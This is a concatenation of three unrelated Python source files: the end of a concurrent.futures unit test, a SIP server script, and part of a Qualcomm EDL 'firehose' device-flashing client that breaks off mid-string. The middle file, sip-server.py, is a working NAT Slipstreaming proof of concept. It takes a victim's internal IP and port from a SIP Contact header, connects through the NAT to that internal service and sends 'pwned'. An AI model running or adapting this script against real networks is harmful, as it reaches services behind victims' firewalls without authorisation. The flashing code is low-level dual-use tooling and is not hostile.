'<Future at 0x[0-9a-f]+ state=running>')
self.assertRegex(repr(CANCELLED_FUTURE),
'<Future at 0x[0-9a-f]+ state=cancelled>')
self.assertRegex(repr(CANCELLED_AND_NOTIFIED_FUTURE),
'<Future at 0x[0-9a-f]+ state=cancelled>')
self.assertRegex(
repr(EXCEPTION_FUTURE),
'<Future at 0x[0-9a-f]+ state=finished raised OSError>')
self.assertRegex(
repr(SUCCESSFUL_FUTURE),
'<Future at 0x[0-9a-f]+ state=finished returned int>')
def test_cancel(self):
f1 = create_future(state=PENDING)
f2 = create_future(state=RUNNING)
f3 = create_future(state=CANCELLED)
f4 = create_future(state=CANCELLED_AND_NOTIFIED)
f5 = create_future(state=FINISHED, exception=OSError())
f6 = create_future(state=FINISHED, result=5)
self.assertTrue(f1.cancel())
self.assertEqual(f1._state, CANCELLED)
self.assertFalse(f2.cancel())
self.assertEqual(f2._state, RUNNING)
self.assertTrue(f3.cancel())
self.assertEqual(f3._state, CANCELLED)
self.assertTrue(f4.cancel())
self.assertEqual(f4._state, CANCELLED_AND_NOTIFIED)
self.assertFalse(f5.cancel())
self.assertEqual(f5._state, FINISHED)
self.assertFalse(f6.cancel())
self.assertEqual(f6._state, FINISHED)
def test_cancelled(self):
self.assertFalse(PENDING_FUTURE.cancelled())
self.assertFalse(RUNNING_FUTURE.cancelled())
self.assertTrue(CANCELLED_FUTURE.cancelled())
self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.cancelled())
self.assertFalse(EXCEPTION_FUTURE.cancelled())
self.assertFalse(SUCCESSFUL_FUTURE.cancelled())
def test_done(self):
self.assertFalse(PENDING_FUTURE.done())
self.assertFalse(RUNNING_FUTURE.done())
self.assertTrue(CANCELLED_FUTURE.done())
self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.done())
self.assertTrue(EXCEPTION_FUTURE.done())
self.assertTrue(SUCCESSFUL_FUTURE.done())
def test_running(self):
self.assertFalse(PENDING_FUTURE.running())
self.assertTrue(RUNNING_FUTURE.running())
self.assertFalse(CANCELLED_FUTURE.running())
self.assertFalse(CANCELLED_AND_NOTIFIED_FUTURE.running())
self.assertFalse(EXCEPTION_FUTURE.running())
self.assertFalse(SUCCESSFUL_FUTURE.running())
def test_result_with_timeout(self):
self.assertRaises(futures.TimeoutError,
PENDING_FUTURE.result, timeout=0)
self.assertRaises(futures.TimeoutError,
RUNNING_FUTURE.result, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_FUTURE.result, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_AND_NOTIFIED_FUTURE.result, timeout=0)
self.assertRaises(OSError, EXCEPTION_FUTURE.result, timeout=0)
self.assertEqual(SUCCESSFUL_FUTURE.result(timeout=0), 42)
def test_result_with_success(self):
# TODO(brian@sweetapp.com): This test is timing dependent.
def notification():
# Wait until the main thread is waiting for the result.
time.sleep(1)
f1.set_result(42)
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertEqual(f1.result(timeout=5), 42)
t.join()
def test_result_with_cancel(self):
# TODO(brian@sweetapp.com): This test is timing dependent.
def notification():
# Wait until the main thread is waiting for the result.
time.sleep(1)
f1.cancel()
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertRaises(futures.CancelledError, f1.result, timeout=5)
t.join()
def test_exception_with_timeout(self):
self.assertRaises(futures.TimeoutError,
PENDING_FUTURE.exception, timeout=0)
self.assertRaises(futures.TimeoutError,
RUNNING_FUTURE.exception, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_FUTURE.exception, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_AND_NOTIFIED_FUTURE.exception, timeout=0)
self.assertTrue(isinstance(EXCEPTION_FUTURE.exception(timeout=0),
OSError))
self.assertEqual(SUCCESSFUL_FUTURE.exception(timeout=0), None)
def test_exception_with_success(self):
def notification():
# Wait until the main thread is waiting for the exception.
time.sleep(1)
with f1._condition:
f1._state = FINISHED
f1._exception = OSError()
f1._condition.notify_all()
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertTrue(isinstance(f1.exception(timeout=5), OSError))
t.join()
@test.support.reap_threads
def test_main():
try:
test.support.run_unittest(__name__)
finally:
test.support.reap_children()
if __name__ == "__main__":
test_main()
|
sip-server.py
|
#!/usr/bin/python3
### Simple SIP Server - natty slipstream
### Just handles SIP part (no HTTP magic)
### Inspired by NAT Slipstream code (https://samy.pl/slipstream)
from socket import socket, SOL_SOCKET, SOCK_STREAM, SO_REUSEADDR, AF_INET
from re import search
from http.server import HTTPServer
from handler import Handler
from argparse import ArgumentParser, ArgumentTypeError
from threading import Thread
# serve pwn_port on http server
def run(listen_port, pwn_port):
print('HTTP serving port {} from port {}'.format(pwn_port, listen_port))
Handler.port_num = pwn_port
httpd = HTTPServer(('', listen_port), Handler)
httpd.serve_forever()
# Type to ensure port range. Could use argparse's "choices" option, but it looks terrible in the help output
def port(num):
if isinstance(num, str):
try:
ret_num = int(num)
if 1 <= ret_num <= 65535:
return ret_num
else:
raise ArgumentTypeError('Value {} invalid port. Must be integer within [1, 65535]')
except ValueError:
raise ArgumentTypeError('Value {} invalid port. Must be integer within [1, 65535]')
raise ArgumentTypeError('Value {} invalid port. Must be integer within [1, 65535]')
# CLI argument parsing
def get_args():
parser = ArgumentParser(description='NAT Slipstreaming via Python')
parser.add_argument('pwn_port', help='Port on the victim to connect to', type=port, default=3306)
parser.add_argument('-l', '--listen-port', help='Port for the HTTP server to listen on.', default=8080, type=port)
return parser.parse_args()
def main(args):
# used for finding IPs to match
contact_pattern = r'(25[0-5]|2[0-4]\d|[01]?\d\d?)\.(25[0-5]|2[0-4]\d|[01]?\d\d?)\.(25[0-5]|2[0-4]\d|[01]?\d\d?)\.(25[0-5]|2[0-4]\d|[01]?\d\d?):\d+(?=;)'
http_thread = Thread(target=run, args=(args.listen_port, args.pwn_port))
http_thread.start()
s = socket(AF_INET, SOCK_STREAM)
s.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
s.bind(("", 5060))
s.listen()
i = 1
print('Begin connection acceptance loop')
while True:
con, client = s.accept()
print("Connection from", client)
done = 0
incoming_message = ""
while done < 4: # simple way to detect EOM
dataFromClient = con.recv(1)
d = dataFromClient.decode()
incoming_message += d
print(d, end="")
done = done + 1 if d in "\r\n" else 0
contact = ""
via = ""
header = '-' * 5 + ' RECEIVED ' + '-' * 5
print('-' * 5, 'RECEIVED', '-' * 5)
print(incoming_message)
print('-' * len(header))
for line in incoming_message.splitlines():
if line.startswith("Contact:"):
contact = line
print('Contact: \"{}\"'.format(contact))
if line.startswith("Via:"):
via = line
print('Via: \"{}\"'.format(via))
print("Sending response #{}".format(i))
i += 1
BODY = "SIP/2.0 200 OK\r\n" + \
via + ";received=0.0.0.0\r\n" + \
"From: <sip:wuzzi@example.org;transport=TCP>;tag=U7c3d519\r\n" + \
"To: <sip:wuzzi@example.org;transport=TCP>;tag=37GkEhwl6\r\n" + \
"Call-ID: aaaaaaaaaaaaaaaaa0404aaaaaaaaaaaabbbbbbZjQ4M2M.\r\n" + \
"CSeq: 1 REGISTER\r\n" + \
contact + ";expires=3600\r\n" + \
"Content-Length: 0\r\n\r\n"
print(BODY)
print('-' * len(header))
con.send(BODY.encode("ascii"))
# Connect to pwnd service
con_ip, con_port = search(contact_pattern, contact).group().split(':')
s2 = socket(AF_INET, SOCK_STREAM)
s2.connect((con_ip, int(con_port)))
s2.send(b'pwned\n')
s2.close()
con.close()
print("Response sent.")
if __name__ == '__main__':
main(get_args())
|
firehose.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# (c) B.Kerler 2018-2019
import binascii
import io
import platform
import time
import json
from struct import unpack
from binascii import hexlify
from queue import Queue
from threading import Thread
from edlclient.Library.utils import *
from edlclient.Library.gpt import gpt
from edlclient.Library.sparse import QCSparse
from edlclient.Library.utils import progress
try:
from edlclient.Library.Modules.init import modules
except ImportError as e:
pass
class nand_partition:
partentries = {}
def __init__(self, parent, printer=None):
if printer is None:
self.printer = print
else:
self.printer = printer
self.partentries = {}
self.partitiontblsector = None
self.parent = parent
self.storage_info = {}
def parse(self, partdata):
self.partentries = {}
class partf:
sector = 0
sectors = 0
name = ""
attr1 = 0
attr2 = 0
attr3 = 0
which_flash = 0
magic1, magic2, version, numparts = unpack("<IIII", partdata[0:0x10])
if magic1 == 0x55EE73AA or magic2 == 0xE35EBDDB:
data = partdata[0x10:]
for i in range(0, len(data) // 0x1C):
name, offset, length, attr1, attr2, attr3, which_flash = unpack("16sIIBBBB",
data[i * 0x1C:(i * 0x1C) + 0x1C])
if name[1] != 0x3A:
break
np = partf()
np.name = name[2:].rstrip(b"\x00").decode('utf-8').lower()
np.sector = offset * self.parent.cfg.block_size // self.parent.cfg.SECTOR_SIZE_IN_BYTES
np.sectors = (length & 0xFFFF) * self.parent.cfg.block_size // self.parent.cfg.SECTOR_SIZE_IN_BYTES
np.attr1 = attr1
np.attr2 = attr2
np.attr3 = attr3
np.which_flash = which_flash
self.partentries[np.name] = np
return True
return False
def print(self):
self.printer("Name Offset\t\tLength\t\tAttr\t\t\tFlash")
self.printer("-------------------------------------------------------------")
for selpart in self.partentries:
partition = self.partentries[selpart]
name = partition.name
for i in range(0x10 - len(partition.name)):
name += " "
offset = partition.sector * self.parent.cfg.SECTOR_SIZE_IN_BYTES
length = partition.sectors * self.parent.cfg.SECTOR_SIZE_IN_BYTES
attr1 = partition.attr1
attr2 = partition.attr2
attr3 = partition.attr3
which_flash = partition.which_flash
self.printer(
f"{name}\t%08X\t%08X\t{hex(attr1)}/{hex(attr2)}/{hex(attr3)}\t{which_flash}" % (offset, length))
def writefile(wf, q, stop):
while True:
data = q.get()
if len(data) > 0:
wf.write(data)
q.task_done()
if stop() and q.empty():
break
class asyncwriter():
def __init__(self, wf):
self.writequeue = Queue()
self.worker = Thread(target=writefile, args=(wf, self.writequeue, lambda: self.stopthreads,))
self.worker.setDaemon(True)
self.stopthreads = False
self.worker.start()
def write(self, data):
self.writequeue.put_nowait(data)
def stop(self):
self.stopthreads = True
self.writequeue.join()
class firehose(metaclass=LogBase):
class cfg:
TargetName = ""
Version = ""
ZLPAwareHost = 1
SkipStorageInit = 0
SkipWrite = 0
MaxPayloadSizeToTargetInBytes = 1048576
MaxPayloadSizeFromTargetInBytes = 8192
MaxXMLSizeInBytes = 4096
bit64 = True
total_blocks = 0
block_size = 0
SECTOR_SIZE_IN_BYTES = 0
MemoryName = "eMMC"
prod_name = "Unknown"
maxlun = 99
def __init__(self, cdc, xml, cfg, loglevel, devicemodel, serial, skipresponse, luns, args):
self.cdc = cdc
self.lasterror = b""
self.loglevel = loglevel
self.args = args
self.xml = xml
self.cfg = cfg
self.prog = 0
self.progtime = 0
self.progpos = 0
self.pk = None
self.modules = None
self.serial = serial
self.devicemodel = devicemodel
self.skipresponse = skipresponse
self.luns = luns
self.supported_functions = []
self.lunsizes = {}
self.info = self.__logger.info
self.error = self.__logger.error
self.debug = self.__logger.debug
self.warning = self.__logger.warning
self.__logger.setLevel(loglevel)
if loglevel == logging.DEBUG:
logfilename = "log.txt"
fh = logging.FileHandler(logfilename)
self.__logger.addHandler(fh)
self.nandparttbl = None
self.nandpart = nand_partition(parent=self, printer=print)
def detect_partition(self, arguments, partitionname):
fpartitions = {}
for lun in self.luns:
lunname = "Lun" + str(lun)
fpartitions[lunname] = []
data, guid_gpt = self.get_gpt(lun, int(arguments["--gpt-num-part-entries"]),
int(arguments["--gpt-part-entry-size"]),
int(arguments["--gpt-part-entry-start-lba"]))
if guid_gpt is None:
break
else:
if partitionname in guid_gpt.partentries:
return [True, lun, guid_gpt.partentries[partitionname]]
for part in guid_gpt.partentries:
fpartitions[lunname].append(part)
return [False, fpartitions]
def getstatus(self, resp):
if "value" in resp:
value = resp["value"]
if value == "ACK":
return True
else:
return False
return True
def decoder(self, data):
if isinstance(data, bytes) or isinstance(data, bytearray):
if data[:5] == b"<?xml":
try:
rdata = ""
for line in data.split(b"\n"):
try:
rdata += line.decode('utf-8') + "\n"
except Exception as err:
self.debug(str(err))
rdata += hexlify(line).decode('utf-8') + "\n"
return rdata
except Exception as err: # pylint: disable=broad-except
self.debug(str(err))
pass
return data
def xmlsend(self, data, skipresponse=False):
if isinstance(data, bytes) or isinstance(data, bytearray):
self.cdc.write(data[:self.cfg.MaxXMLSizeInBytes])
else:
self.cdc.write(bytes(data, 'utf-8')[:self.cfg.MaxXMLSizeInBytes])
# time.sleep(0.01)
rdata = bytearray()
counter = 0
timeout = 30
resp = {"value": "NAK"}
status = False
if not skipresponse:
while b"<response value" not in rdata:
try:
tmp = self.cdc.read(self.cfg.MaxXMLSizeInBytes)
if tmp == b"" in rdata:
counter += 1
time.sleep(0.05)
if counter > timeout:
break
rdata += tmp
except Exception as err:
self.error(err)
return [False, resp, data]
try:
if b"raw hex token" in rdata:
rdata = rdata
try:
resp = self.xml.getresponse(rdata)
except Exception as e: # pylint: disable=broad-except
rdata = bytes(self.decoder(rdata), 'utf-8')
resp = self.xml.getresponse(rdata)
status = self.getstatus(resp)
except Exception as err:
status = True
self.debug(str(err))
if isinstance(rdata, bytes) or isinstance(rdata, bytearray):
try:
self.debug("Error on getting xml response:" + rdata.decode('utf-8'))
except Exception as err:
self.debug("Error on getting xml response:" + hexlify(rdata).decode('utf-8') +
", Error: " + str(err))
elif isinstance(rdata, str):
self.debug("Error on getting xml response:" + rdata)
return [status, {"value": "NAK"}, rdata]
else:
status = True
resp = {"value": "ACK"}
return [status, resp, rdata]
def cmd_reset(self):
data = "<?xml version=\"1.0\" ?><data><power value=\"reset\"/></data>"
val = self.xmlsend(data)
try:
v = None
while v != b'':
v = self.cdc.read(self.cfg.MaxXMLSizeInBytes)
if v != b'':
resp = self.xml.getlog(v)[0]
else:
break
print(resp)
except Exception as err:
self.error(str(err))
pass
if val[0]:
self.info("Reset succeeded.")
return True
else:
self.error("Reset failed.")
return False
def cmd_xml(self, filename):
with open(filename, 'rb') as rf:
data = rf.read()
val = self.xmlsend(data)
if val[0]:
self.info("Command succeeded." + str(val[2]))
return val[2]
else:
self.error("Command failed:" + str(val[2]))
return val[2]
def cmd_nop(self):
data = "<?xml version=\"1.0\" ?><data><nop /></data>"
self.xmlsend(data, True)
info = b""
tmp = None
while tmp != b"":
tmp = self.cdc.read(self.cfg.MaxXMLSizeInBytes)
if tmp == b"":
break
info += tmp
if info != b"":
self.info("Nop succeeded.")
return self.xml.getlog(info)
else:
self.error("Nop failed.")
return False
def cmd_getsha256digest(self, physical_partition_number, start_sector, num_partition_sectors):
data = f"<?xml version=\"1.0\" ?><data><getsha256digest" + \
f" SECTOR_SIZE_IN_BYTES=\"{self.cfg.SECTOR_SIZE_IN_BYTES}\"" + \
f" num_partition_sectors=\"{num_partition_sectors}\"" + \
f" physical_partition_number=\"{physical_partition_number}\"" + \
f" start_sector=\"{start_sector}\"/>\n</data>"
val = self.xmlsend(data)
if val[0]:
res = self.xml.getlog(val[2])
for line in res:
self.info(line)
if "Digest " in res:
return res.split("Digest ")[1]
else:
return res
else:
self.error("GetSha256Digest failed.")
return False
def cmd_setbootablestoragedrive(self, partition_number):
data = f"<?xml version=\"1.0\" ?><data>\n<setbootablestoragedrive value=\"{str(partition_number)}\" /></data>"
val = self.xmlsend(data)
if val[0]:
self.info("Setbootablestoragedrive succeeded.")
return True
else:
self.error("Setbootablestoragedrive failed: %s" % val[2])
return False
def cmd_send(self, content, response=True):
data = f"<?xml version=\"1.0\" ?><data>\n<{content} /></data>"
if response:
val = self.xmlsend(data)
if val[0] and b"log value=\"ERROR\"" not in val[1]:
return val[2]
else:
self.error(f"{content} failed.")
self.error(f"{val[2]}")
return val[1]
else:
self.xmlsend(data, True)
return True
def cmd_patch(self, physical_partition_number, start_sector, byte_offset, value, size_in_bytes, display=True):
"""
<patch SECTOR_SIZE_IN_BYTES="512" byte_offset="16" filename="DISK" physical_partition_number="0"
size_in_bytes="4" start_sector="NUM_DISK_SECTORS-1." value="0" what="Zero Out Header CRC in Backup Header."/>
"""
data = f"<?xml version=\"1.0\" ?><data>\n" + \
f"<patch SECTOR_SIZE_IN_BYTES=\"{self.cfg.SECTOR_SIZE_IN_BYTES}\"" + \
f" byte_offset=\"{byte_offset}\"" + \
f" filename=\"DISK\"" + \
f" physical_partition_number=\"{physical_partition_number}\"" + \
f" size_in_bytes=\"{size_in_bytes}\" " + \
f" start_sector=\"{start_sector}\" " + \
f" value=\"{value}\" "
if self.modules is not None:
data += self.modules.addpatch()
data += f"/>\n</data>"
rsp = self.xmlsend(data)
if rsp[0]:
if display:
self.info(f"Patch:\n--------------------\n")
self.info(rsp[1])
return True
else:
self.error(f"Error:{rsp}")
return False
def wait_for_data(self):
tmp = bytearray()
timeout = 0
while b'response value' not in tmp:
res = self.cdc.read(self.cfg.MaxXMLSizeInBytes)
if res == b'':
timeout += 1
if timeout == 4:
break
time.sleep(0.1)
tmp += res
return tmp
def cmd_program(self, physical_partition_number, start_sector, filename, display=True):
total = os.stat(filename).st_size
sparse = QCSparse(filename, self.loglevel)
sparseformat = False
if sparse.readheader():
sparseformat = True
total = sparse.getsize()
bytestowrite = total
progbar = progress(self.cfg.SECTOR_SIZE_IN_BYTES)
with open(filename, "rb") as rf:
# Make sure we fill data up to the sector size
num_partition_sectors = total // self.cfg.SECTOR_SIZE_IN_BYTES
if (total % self.cfg.SECTOR_SIZE_IN_BYTES) != 0:
num_partition_sectors += 1
if display:
self.info(f"\nWriting to physical partition {str(physical_partition_number)}, " +
f"sector {str(start_sector)}, sectors {str(num_partition_sectors)}")
data = f"<?xml version=\"1.0\" ?><data>\n" + \
f"<program SECTOR_SIZE_IN_BYTES=\"{self.cfg.SECTOR_SIZE_IN_BYTES}\"" + \
f" num_partition_sectors=\"{num_partition_sectors}\"" + \
f" physical_partition_number=\"{physical_partition_number}\"" + \
f" start_sector=\"{start_sector}\" "
if self.modules is not None:
data += self.modules.addprogram()
data += f"/>\n</data>"
rsp = self.xmlsend(data, self.skipresponse)
progbar.show_progress(prefix="Write", pos=0, total=total, display=display)
if rsp[0]:
old = 0
while bytestowrite > 0:
wlen = min(bytestowrite, self.cfg.MaxPayloadSizeToTargetInBytes)
if sparseformat:
wdata = sparse.read(wlen)
else:
wdata = rf.read(wlen)
bytestowrite -= wlen
if wlen % self.cfg.SECTOR_SIZE_IN_BYTES != 0:
filllen = (wlen // self.cfg.SECTOR_SIZE_IN_BYTES * self.cfg.SECTOR_SIZE_IN_BYTES) + \
self.cfg.SECTOR_SIZE_IN_BYTES
wdata += b"\x00" * (filllen - wlen)
self.cdc.write(wdata)
progbar.show_progress(prefix="Write", pos=total - bytestowrite, total=total, display=display)
self.cdc.write(b'')
# time.sleep(0.2)
wd = self.wait_for_data()
log = self.xml.getlog(wd)
rsp = self.xml.getresponse(wd)
if "value" in rsp:
if rsp["value"] != "ACK":
self.error(f"Error:")
for line in log:
self.error(line)
return False
else:
self.error(f"Error:{rsp}")
return False
return True
def cmd_program_buffer(self, physical_partition_number, start_sector, wfdata, display=True):
bytestowrite = len(wfdata)
total = bytestowrite
# Make sure we fill data up to the sector size
num_partition_sectors = bytestowrite // self.cfg.SECTOR_SIZE_IN_BYTES
if (bytestowrite % self.cfg.SECTOR_SIZE_IN_BYTES) != 0:
num_partition_sectors += 1
if display:
self.info(f"\nWriting to physical partition {str(physical_partition_number)}, " +
f"sector {str(start_sector)}, sectors {str(num_partition_sectors)}")
data = f"<?xml version=\"1.0\" ?><data>\n" + \
f"<program SECTOR_SIZE_IN_BYTES=\"{self.cfg.SECTOR_SIZE_IN_BYTES}\"" + \
f" num_partition_sectors=\"{num_partition_sectors}\"" + \
f" physical_partition_number=\"{physical_partition_number}\"" + \
f" start_sector=\"{start_sector}\" "
if self.modules is not None:
data += self.modules.addprogram()
data += f"/>\n</data>"
rsp = self.xmlsend(data, self.skipresponse)
progbar = progress(self.cfg.SECTOR_SIZE_IN_BYTES)
progbar.show_progress(prefix="Write", pos=0, total=total, display=display)
if rsp[0]:
old = 0
pos = 0
while bytestowrite > 0:
wlen = min(bytestowrite, self.cfg.MaxPayloadSizeToTargetInBytes)
wrdata = wfdata[pos:pos + wlen]
pos += wlen
bytestowrite -= wlen
if wlen % self.cfg.SECTOR_SIZE_IN_BYTES != 0:
filllen = (wlen // self.cfg.SECTOR_SIZE_IN_BYTES * self.cfg.SECTOR_SIZE_IN_BYTES) + \
self.cfg.SECTOR_SIZE_IN_BYTES
wrdata += b"\x00" * (filllen - wlen)
self.cdc.write(wrdata)
progbar.show_progress(prefix="Write", pos=total - bytestowrite, total=total, display=display)
self.cdc.write(b'')
# time.sleep(0.2)
wd = self.wait_for_data()
log = self.xml.getlog(wd)
rsp = self.xml.getresponse(wd)
if "value" in rsp:
if rsp["value"] != "ACK":
self.error(f"Error:")
for line in log:
self.error(line)
return False
else:
self.error(f"Error:{rsp}")
return False
return True
def cmd_erase(self, physical_partition_number, start_sector, num_partition_sectors, display=True):
if display:
self.info(f"\nErasing from physical partition {str(physical_partition_number)}, " +
f"sector {str(start_sector)}, sectors {str(num_partition_sectors)}")
data = f"<?xml version=\"1.0\" ?><data>\n" + \
f"<program SECTOR_SIZE_IN_BYTES=\"{self.cfg.SECTOR_SIZE_IN_BYTES}\"" + \
f" num_partition_sectors=\"{num_partition_sectors}\"" + \
f" physical_partition_number=\"{physical_partition_number}\"" + \
f" start_sector=\"{start_sector}\" "
if self.modules is not None:
data += self.modules.addprogram()
data += f"/>\n</data>"
rsp = self.xmlsend(data, self.skipresponse)
empty = b"\x00" * self.cfg.MaxPayloadSizeToTargetInBytes
pos = 0
bytestowrite = self.cfg.SECTOR_SIZE_IN_BYTES * num_partition_sectors
total = self.cfg.SECTOR_SIZE_IN_BYTES * num_partition_sectors
progbar = progress(self.cfg.MaxPayloadSizeToTargetInBytes)
progbar.show_progress(prefix="Erase", pos=0, total=total, display=display)
if rsp[0]:
while bytestowrite > 0:
wlen = min(bytestowrite, self.cfg.MaxPayloadSizeToTargetInBytes)
self.cdc.write(empty[:wlen])
progbar.show_progress(prefix="Erase", pos=total - bytestowrite, total=total, display=display)
bytestowrite -= wlen
pos += wlen
self.cdc.write(b'')
res = self.wait_for_data()
info = self.xml.getlog(res)
rsp = self.xml.getresponse(res)
if "value" in rsp:
if rsp["value"] != "ACK":
self.error(f"Error:")
for line in info:
self.error(line)
return False
else:
self.error(f"Error:{rsp}")
return False
return True
def cmd_read(self, physical_partition_number, start_sector, num_partition_sectors, filename, display=True):
self.lasterror = b""
prog = 0
progbar = progress(self.cfg.SECTOR_SIZE_IN_BYTES)
if display:
self.info(
f"\nReading from physical partition {str(physical_partition_number)}, " +
f"sector {str(start_sector)}, sectors {str(num_partition_sectors)}")
with open(file=filename, mode="wb", buffering=self.cfg.MaxPayloadSizeFromTargetInBytes) as wr:
data = f"<?xml version=\"1.0\" ?><data><read SECTOR_SIZE_IN_BYTES=\"{self.cfg.SECTOR_SIZE_IN_BYTES}\"" + \
f" num_partition_sectors=\"{num_partition_sectors}\"" + \
f" physical_partition_number=\"{physical_partition_number}\"" + \
f" start_sector=\"{start_sector}\"/>\n</data>"
rsp = self.xmlsend(data, self.skipresponse)
# time.sleep(0.01)
if rsp[0]:
if "value" in rsp[1]:
if rsp[1]["value"] == "NAK":
if display:
self.error(rsp[2].decode('utf-8'))
return b""
bytestoread = self.cfg.SECTOR_SIZE_IN_BYTES * num_partition_sectors
total = bytestoread
show_progress = progbar.show_progress
usb_read = self.cdc.read
progbar.show_progress(prefix="Read", pos=0, total=total, display=display)
while bytestoread > 0:
size=min(self.cfg.MaxPayloadSizeToTargetInBytes, bytestoread)
data = usb_read(size)
wr.write(data)
bytestoread -= len(data)
show_progress(prefix="Read", pos=total - bytestoread, total=total, display=display)
# time.sleep(0.2)
wd = self.wait_for_data()
info = self.xml.getlog(wd)
rsp = self.xml.getresponse(wd)
if "value" in rsp:
if rsp["value"] != "ACK":
self.error(f"Error:")
for line in info:
self.error(line)
self.lasterror += bytes(line + "\n", "utf-8")
return False
else:
if display:
self.error(f"Error:{rsp[2]}")
return False
if display and prog != 100:
print_progress(100, 100, prefix='Progress:', suffix='Complete', bar_length=50)
return True
def cmd_read_buffer(self, physical_partition_number, start_sector, num_partition_sectors, display=True):
self.lasterror = b""
prog = 0
if display:
self.info(
f"\nReading from physical partition {str(physical_partition_number)}, " +
f"sector {str(start_sector)}, sectors {str(num_partition_sectors)}")
print_progress(prog, 100, prefix='Progress:', suffix='Complete', bar_length=50)
data = f"<?xml version=\"1.0\" ?><data><read SECTOR_SIZE_IN_BYTES=\"{self.cfg.SECTOR_SIZE_IN_BYTES}\"" + \
f" num_partition_sectors=\"{num_partition_sectors}\"" + \
f" physical_partition_number=\"{physical_partition_number}\"" + \
f" start_sector=\"{start_sector}\"/>\n</data>"
progbar = progress(self.cfg.SECTOR_SIZE_IN_BYTES)
rsp = self.xmlsend(data, self.skipresponse)
resData = bytearray()
if rsp[0]:
if "value" in rsp[1]:
if rsp[1]["value"] == "NAK":
if display:
self.error(rsp[2].decode('utf-8'))
return -1
bytestoread = self.cfg.SECTOR_SIZE_IN_BYTES * num_partition_sectors
total = bytestoread
if display:
progbar.show_progress(prefix="Read", pos=total - bytestoread, total=total, display=display)
while bytestoread > 0:
tmp = self.cdc.read(min(self.cdc.EP_IN.wMaxPacketSize, bytestoread))
size = len(tmp)
bytestoread -= size
resData.extend(tmp)
progbar.show_progress(prefix="Read", pos=total - bytestoread, total=total, display=display)
wd = self.wait_for_data()
info = self.xml.getlog(wd)
rsp = self.xml.getresponse(wd)
if "value" in rsp:
if rsp["value"] != "ACK":
self.error(f"Error:")
for line in info:
self.error(line)
return resData
else:
if len(rsp) > 1:
if b"Failed to open the UFS Device" in rsp[2]:
self.error(f"Error:{rsp[2]}")
self.lasterror = rsp[2]
return resData
if len(rsp) > 2 and not rsp[0]:
self.lasterror = rsp[2]
if display and prog != 100:
progbar.show_progress(prefix="Read", pos=total, total=total, display=display)
return resData # Do not remove, needed for oneplus
def get_gpt(self, lun, gpt_num_part_entries, gpt_part_entry_size, gpt_part_entry_start_lba):
try:
data = self.cmd_read_buffer(lun, 0, 2, False)
except Exception as err:
self.debug(str(err))
self.skipresponse = True
data = self.cmd_read_buffer(lun, 0, 2, False)
if data == b"" or data == -1:
return None, None
magic = unpack("<I", data[0:4])[0]
if magic == 0x844bdcd1:
self.info("Nand storage detected. Trying to find partition table")
if self.nandpart.partitiontblsector is None:
for sector in range(0, 1024):
data = self.cmd_read_buffer(0, sector, 1, False)
if data[0:8] != b"\xac\x9f\x56\xfe\x7a\x12\x7f\xcd":
continue
self.nandpart.partitiontblsector = sector
if self.nandpart.partitiontblsector is not None:
data = self.cmd_read_buffer(0, self.nandpart.partitiontblsector + 1, 2, False)
if self.nandpart.parse(data):
return data, self.nandpart
return None, None
else:
guid_gpt = gpt(
num_part_entries=gpt_num_part_entries,
part_entry_size=gpt_part_entry_size,
part_entry_start_lba=gpt_part_entry_start_lba,
loglevel=self.__logger.level
)
try:
header = guid_gpt.parseheader(data, self.cfg.SECTOR_SIZE_IN_BYTES)
if header.signature == b"EFI PART":
gptsize = (header.part_entry_start_lba * self.cfg.SECTOR_SIZE_IN_BYTES) + (
header.num_part_entries * header.part_entry_size)
sectors = gptsize // self.cfg.SECTOR_SIZE_IN_BYTES
if gptsize % self.cfg.SECTOR_SIZE_IN_BYTES != 0:
sectors += 1
if sectors == 0:
return None, None
if sectors > 64:
sectors = 64
data = self.cmd_read_buffer(lun, 0, sectors, False)
if data == b"":
return None, None
guid_gpt.parse(data, self.cfg.SECTOR_SIZE_IN_BYTES)
return data, guid_gpt
else:
return None, None
except Exception as err:
self.debug(str(err))
return None, None
def get_backup_gpt(self, lun, gpt_num_part_entries, gpt_part_entry_size, gpt_part_entry_start_lba):
data = self.cmd_read_buffer(lun, 0, 2, False)
if data == b"":
return None
guid_gpt = gpt(
num_part_entries=gpt_num_part_entries,
part_entry_size=gpt_part_entry_size,
part_entry_start_lba=gpt_part_entry_start_lba,
loglevel=self.__logger.level
)
header = guid_gpt.parseheader(data, self.cfg.SECTOR_SIZE_IN_BYTES)
if "backup_lba" in header:
sectors = header.first_usable_lba - 1
data = self.cmd_read_buffer(lun, header.backup_lba, sectors, False)
if data == b"":
return None
return data
else:
return None
def calc_offset(self, sector, offset):
sector = sector + (offset // self.cfg.SECTOR_SIZE_IN_BYTES)
offset = offset % self.cfg.SECTOR_SIZE_IN_BYTES
return sector, offset
def getluns(self, argument):
if argument["--lun"] is not None:
return [int(argument["--lun"])]
luns = []
if self.cfg.MemoryName.lower() == "ufs":
for i in range(0, self.cfg.maxlun):
luns.append(i)
else:
luns = [0]
return luns
def configure(self, lvl):
if self.cfg.SECTOR_SIZE_IN_BYTES == 0:
if self.cfg.MemoryName.lower() == "emmc":
self.cfg.SECTOR_SIZE_IN_BYTES = 512
else:
self.cfg.SECTOR_SIZE_IN_BYTES = 4096
connectcmd = f"<?xml version =\"1.0\" ?><data>" + \
f"<configure MemoryName=\"{self.cfg.MemoryName}\" " + \
f"ZLPAwareHost=\"{str(self.cfg.ZLPAwareHost)}\" " + \
f"SkipStorageInit=\"{str(int(self.cfg.SkipStorageInit))}\" " + \
f"SkipWrite=\"{str(int(self.cfg.SkipWrite))}\" " + \
f"Verbose=\"True\" " + \
f"MaxPayloadSizeToTargetInBytes=\"{str(self.cfg.MaxPayloadSizeToTargetInBytes)}\"/>" + \
"</data>"
'''
"<?xml version=\"1.0\" encoding=\"UTF-8\" ?><data><response value=\"ACK\" MinVersionSupported=\"1\"" \
